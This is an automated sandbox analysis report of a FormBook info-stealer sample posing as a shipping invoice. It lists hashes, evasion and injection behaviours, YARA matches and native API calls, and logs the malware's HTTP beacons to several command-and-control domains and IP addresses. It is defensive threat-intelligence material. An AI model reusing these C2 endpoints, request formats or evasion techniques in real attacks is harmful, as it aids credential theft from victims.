Analysis Report Shipping INVOICE-BL Shipment..exe

Overview

General Information

Sample Name: Shipping INVOICE-BL Shipment..exe
Analysis ID: 323227
MD5: 579ba39b6a146080ef6481591440e445
SHA1: 06bfc3b47e1ad6a35e10cb4a1edee6c563710107
SHA256: d8d9bb65ea3637fda09488baada0c9b387e0619b7c430b93c8a0fa2d8b489bc1
Tags: Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Executable has a suspicious name (potential lure to open the executable)
Hijacks the control flow in another process
Initial sample is a PE file and has a suspicious name
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Overwrites code with unconditional jumps - possibly setting hooks in a foreign process
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Uses netsh to modify the Windows network and firewall settings
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
PE file does not import any functions
Sample execution stops while process was sleeping (likely an evasion)
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection:

Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Prehnite.dll ReversingLabs: Detection: 27%
Multi AV Scanner detection for submitted file
Source: Shipping INVOICE-BL Shipment..exe Virustotal: Detection: 27%
Source: Shipping INVOICE-BL Shipment..exe ReversingLabs: Detection: 44%
Yara detected FormBook
Source: Yara match File source: 00000009.00000002.914200930.0000000000B50000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.734077242.00000000047D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.733109064.0000000001190000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.728952355.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.914419166.0000000002F60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 2.2.cmd.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.cmd.exe.400000.0.raw.unpack, type: UNPACKEDPE
Antivirus or Machine Learning detection for unpacked file
Source: 2.2.cmd.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe Code function: 0_2_00406469 FindFirstFileA,FindClose, 0_2_00406469
Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe Code function: 0_2_00402765 FindFirstFileA, 0_2_00402765
Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe Code function: 0_2_0040592E CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose, 0_2_0040592E

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Windows\SysWOW64\cmd.exe Code function: 4x nop then pop edi 2_2_00416227
Source: C:\Windows\SysWOW64\cmd.exe Code function: 4x nop then pop edi 2_2_0040C37F
Source: C:\Windows\SysWOW64\cmd.exe Code function: 4x nop then pop esi 2_2_004157F1
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4x nop then pop edi 9_2_02F76227
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4x nop then pop edi 9_2_02F6C37F
Source: C:\Windows\SysWOW64\netsh.exe Code function: 4x nop then pop esi 9_2_02F757F1

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.4:49766
Source: Traffic Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.4:49767
Source: Traffic Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 75.126.100.11:80 -> 192.168.2.4:49769
Source: Traffic Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.4:49771
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected:
    GET /mqgf/?1bz=hhd0GaXlZugFYZhq3yiAARtiWhMpNMVDAm1bIlTaIe3aIDvqoSX91Ws6MgCgWpSSj5gE&v2Jx9=0pY0Q8thwtJli0y0 HTTP/1.1
    Host: www.carnesveymacr.com
    Connection: close
    Data Raw: 00 00 00 00 00 00 00
    Data Ascii: (non-printable)
Source: global traffic HTTP traffic detected:
    GET /mqgf/?v2Jx9=0pY0Q8thwtJli0y0&1bz=YSPUSffqOivhj8Kjp9aQgNvPQF5V6gVVRQ45a2ufWFuMe0FJpEVxFN190mcOe42QTAaS HTTP/1.1
    Host: www.mehler.photography
    Connection: close
    Data Raw: 00 00 00 00 00 00 00
    Data Ascii: (non-printable)
Source: global traffic HTTP traffic detected:
    GET /mqgf/?v2Jx9=0pY0Q8thwtJli0y0&1bz=Nu/G71QL4p4BT86mcqNaj5MI96K7Vz5eVXtDqKTsfKVXKjxrmX+SwuyoO8XqTg4wxzHG HTTP/1.1
    Host: www.thelonerangernews.com
    Connection: close
    Data Raw: 00 00 00 00 00 00 00
    Data Ascii: (non-printable)
Source: global traffic HTTP traffic detected:
    GET /mqgf/?1bz=hQvvPGE3muAzcBcpOXnjuQwkQGZsNu5C1c7nvvAMRpq5p952PPZlPGy2DG7Zpy1FuWTU&v2Jx9=0pY0Q8thwtJli0y0 HTTP/1.1
    Host: www.hvcharging.com
    Connection: close
    Data Raw: 00 00 00 00 00 00 00
    Data Ascii: (non-printable)
Source: global traffic HTTP traffic detected:
    GET /mqgf/?v2Jx9=0pY0Q8thwtJli0y0&1bz=mdpH1kYH/WNDw93QqiOdsAZgQKB+qpRxGfGsjxdQlClZxNZ4TMvv4sve4+Kmt2Uc5176 HTTP/1.1
    Host: www.jddq888.com
    Connection: close
    Data Raw: 00 00 00 00 00 00 00
    Data Ascii: (non-printable)
Source: global traffic HTTP traffic detected:
    GET /mqgf/?1bz=o6fJD+zMZxVzOfk4IEdwtZQvSv9vl5cBPUt1QiawFeZ3y3tXUJIXw0nGuJCyWZvSLK28&v2Jx9=0pY0Q8thwtJli0y0 HTTP/1.1
    Host: www.wtmailer15.com
    Connection: close
    Data Raw: 00 00 00 00 00 00 00
    Data Ascii: (non-printable)
Source: global traffic HTTP traffic detected:
    GET /mqgf/?v2Jx9=0pY0Q8thwtJli0y0&1bz=uH4Dxo5rCetYkfO7KLYRcfVECb5esRD5h1WtuccCG6pO/xNVWEKD01dxTzpIBP2UrYly HTTP/1.1
    Host: www.wastie.club
    Connection: close
    Data Raw: 00 00 00 00 00 00 00
    Data Ascii: (non-printable)
Source: global traffic HTTP traffic detected:
    GET /mqgf/?1bz=KR2H7bR68gwXZ0UwRZoWOm+3/bRM+9g3CvwIMuaCj43AHNBZDZgp33E9vheCRffBPsp5&v2Jx9=0pY0Q8thwtJli0y0 HTTP/1.1
    Host: www.gettingthehelloutofca.com
    Connection: close
    Data Raw: 00 00 00 00 00 00 00
    Data Ascii: (non-printable)
Source: global traffic HTTP traffic detected:
    GET /mqgf/?v2Jx9=0pY0Q8thwtJli0y0&1bz=r6ma+nh27c9Sl8Bs3eAjHKVnQZRxhfFeaDOjGF4iprZzpmOBYsqZcbWmCWTHzEvxY19a HTTP/1.1
    Host: www.caelaabadie.com
    Connection: close
    Data Raw: 00 00 00 00 00 00 00
    Data Ascii: (non-printable)
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 192.0.78.24
Source: Joe Sandbox View IP Address: 34.102.136.180
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: AUTOMATTICUS
Source: Joe Sandbox View ASN Name: DIGITALOCEAN-ASNUS
Source: Joe Sandbox View ASN Name: GOOGLEUS
Source: unknown DNS traffic detected: queries for: www.carnesveymacr.com
Source: global traffic HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Date: Thu, 26 Nov 2020 14:09:00 GMT
    Server: Apache/2.4.6 (CentOS) PHP/7.3.19
    Content-Length: 203
    Connection: close
    Content-Type: text/html; charset=iso-8859-1
    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6d 71 67 66 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /mqgf/ was not found on this server.</p></body></html>
Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://fontfabrik.com
Source: Shipping INVOICE-BL Shipment..exe String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: Shipping INVOICE-BL Shipment..exe String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: nse53A7.tmp.0.dr String found in binary or memory: http://openoffice.org/2001/block-list
Source: explorer.exe, 00000004.00000000.693351563.0000000002B50000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: nse53A7.tmp.0.dr String found in binary or memory: http://www.businessobjects.com0
Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: nse53A7.tmp.0.dr String found in binary or memory: http://www.freedesktop.org/standards/shared-mime-info
Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000004.00000000.710942524.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality to read data from the clipboard
Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe Code function: 0_2_004053CB GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard, 0_2_004053CB
Note: the call chain listed here ends in EmptyClipboard/SetClipboardData behind a popup menu (CreatePopupMenu, TrackPopupMenu), i.e. it writes to the clipboard from a dialog context menu; this is the "Copy Details To Clipboard" handler of the NSIS installer stub (process 0, cf. the nsis.sf.net strings under Networking), not clipboard harvesting by the FormBook payload, which runs in cmd.exe and netsh.exe.

E-Banking Fraud:

Yara detected FormBook
Source: Yara match File source: 00000009.00000002.914200930.0000000000B50000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.734077242.00000000047D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.733109064.0000000001190000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.728952355.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.914419166.0000000002F60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 2.2.cmd.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.cmd.exe.400000.0.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000009.00000002.914200930.0000000000B50000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.914200930.0000000000B50000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.734077242.00000000047D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.734077242.00000000047D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.733109064.0000000001190000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.733109064.0000000001190000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.728952355.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.728952355.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.914419166.0000000002F60000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.914419166.0000000002F60000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.cmd.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.cmd.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.cmd.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.cmd.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Executable has a suspicious name (potential lure to open the executable)
Source: Shipping INVOICE-BL Shipment..exe Static file information: Suspicious name
Initial sample is a PE file and has a suspicious name
Source: initial sample Static PE information: Filename: Shipping INVOICE-BL Shipment..exe
Contains functionality to call native functions
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_00418180 NtCreateFile, 2_2_00418180
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_00418230 NtReadFile, 2_2_00418230
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_004182B0 NtClose, 2_2_004182B0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_0041817A NtCreateFile, 2_2_0041817A
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_004182DA NtClose, 2_2_004182DA
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_004182AC NtClose, 2_2_004182AC
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04B795D0 NtClose,LdrInitializeThunk, 2_2_04B795D0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04B79540 NtReadFile,LdrInitializeThunk, 2_2_04B79540
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04B796E0 NtFreeVirtualMemory,LdrInitializeThunk, 2_2_04B796E0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04B797A0 NtUnmapViewOfSection,LdrInitializeThunk, 2_2_04B797A0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04B79780 NtMapViewOfSection,LdrInitializeThunk, 2_2_04B79780
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04B79FE0 NtCreateMutant,LdrInitializeThunk, 2_2_04B79FE0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04B79710 NtQueryInformationToken,LdrInitializeThunk, 2_2_04B79710
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04B79860 NtQuerySystemInformation,LdrInitializeThunk, 2_2_04B79860
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04B79840 NtDelayExecution,LdrInitializeThunk, 2_2_04B79840
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04B799A0 NtCreateSection,LdrInitializeThunk, 2_2_04B799A0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04B79910 NtAdjustPrivilegesToken,LdrInitializeThunk, 2_2_04B79910
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04B79A20 NtResumeThread,LdrInitializeThunk, 2_2_04B79A20
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04B79A50 NtCreateFile,LdrInitializeThunk, 2_2_04B79A50
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04B795F0 NtQueryInformationFile, 2_2_04B795F0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04B7AD30 NtSetContextThread, 2_2_04B7AD30
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04B79520 NtWaitForSingleObject, 2_2_04B79520
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04B79560 NtWriteFile, 2_2_04B79560
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04B796D0 NtCreateKey, 2_2_04B796D0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04B79610 NtEnumerateValueKey, 2_2_04B79610
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04B79670 NtQueryInformationProcess, 2_2_04B79670
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04B79660 NtAllocateVirtualMemory, 2_2_04B79660
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04B79650 NtQueryValueKey, 2_2_04B79650
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04B79730 NtQueryVirtualMemory, 2_2_04B79730
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04B7A710 NtOpenProcessToken, 2_2_04B7A710
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04B79770 NtSetInformationFile, 2_2_04B79770
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04B7A770 NtOpenThread, 2_2_04B7A770
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04B79760 NtOpenProcess, 2_2_04B79760
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04B798A0 NtWriteVirtualMemory, 2_2_04B798A0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04B798F0 NtReadVirtualMemory, 2_2_04B798F0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04B79820 NtEnumerateKey, 2_2_04B79820
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04B7B040 NtSuspendThread, 2_2_04B7B040
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04B799D0 NtCreateProcessEx, 2_2_04B799D0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04B79950 NtQueueApcThread, 2_2_04B79950
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04B79A80 NtOpenDirectoryObject, 2_2_04B79A80
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04B79A10 NtQuerySection, 2_2_04B79A10
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04B79A00 NtProtectVirtualMemory, 2_2_04B79A00
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04B7A3B0 NtGetContextThread, 2_2_04B7A3B0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_04B79B00 NtSetValueKey, 2_2_04B79B00
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_008054E0 NtDelayExecution, 2_2_008054E0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 2_2_0080318C NtWriteVirtualMemory, 2_2_0080318C
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03749A50 NtCreateFile,LdrInitializeThunk, 9_2_03749A50
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03749910 NtAdjustPrivilegesToken,LdrInitializeThunk, 9_2_03749910
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037499A0 NtCreateSection,LdrInitializeThunk, 9_2_037499A0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03749860 NtQuerySystemInformation,LdrInitializeThunk, 9_2_03749860
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03749840 NtDelayExecution,LdrInitializeThunk, 9_2_03749840
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03749710 NtQueryInformationToken,LdrInitializeThunk, 9_2_03749710
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03749FE0 NtCreateMutant,LdrInitializeThunk, 9_2_03749FE0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03749780 NtMapViewOfSection,LdrInitializeThunk, 9_2_03749780
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037496E0 NtFreeVirtualMemory,LdrInitializeThunk, 9_2_037496E0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037496D0 NtCreateKey,LdrInitializeThunk, 9_2_037496D0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03749540 NtReadFile,LdrInitializeThunk, 9_2_03749540
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037495D0 NtClose,LdrInitializeThunk, 9_2_037495D0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03749B00 NtSetValueKey, 9_2_03749B00
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0374A3B0 NtGetContextThread, 9_2_0374A3B0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03749A20 NtResumeThread, 9_2_03749A20
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03749A10 NtQuerySection, 9_2_03749A10
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03749A00 NtProtectVirtualMemory, 9_2_03749A00
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03749A80 NtOpenDirectoryObject, 9_2_03749A80
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03749950 NtQueueApcThread, 9_2_03749950
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037499D0 NtCreateProcessEx, 9_2_037499D0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0374B040 NtSuspendThread, 9_2_0374B040
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03749820 NtEnumerateKey, 9_2_03749820
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037498F0 NtReadVirtualMemory, 9_2_037498F0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037498A0 NtWriteVirtualMemory, 9_2_037498A0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0374A770 NtOpenThread, 9_2_0374A770
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03749770 NtSetInformationFile, 9_2_03749770
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03749760 NtOpenProcess, 9_2_03749760
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03749730 NtQueryVirtualMemory, 9_2_03749730
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0374A710 NtOpenProcessToken, 9_2_0374A710
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037497A0 NtUnmapViewOfSection, 9_2_037497A0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03749670 NtQueryInformationProcess, 9_2_03749670
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03749660 NtAllocateVirtualMemory, 9_2_03749660
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03749650 NtQueryValueKey, 9_2_03749650
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03749610 NtEnumerateValueKey, 9_2_03749610
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03749560 NtWriteFile, 9_2_03749560
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_0374AD30 NtSetContextThread, 9_2_0374AD30
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_03749520 NtWaitForSingleObject, 9_2_03749520
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_037495F0 NtQueryInformationFile, 9_2_037495F0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_02F782B0 NtClose, 9_2_02F782B0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_02F78230 NtReadFile, 9_2_02F78230
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_02F78180 NtCreateFile, 9_2_02F78180
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_02F782DA NtClose, 9_2_02F782DA
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_02F782AC NtClose, 9_2_02F782AC
Source: C:\Windows\SysWOW64\netsh.exe Code function: 9_2_02F7817A NtCreateFile, 9_2_02F7817A
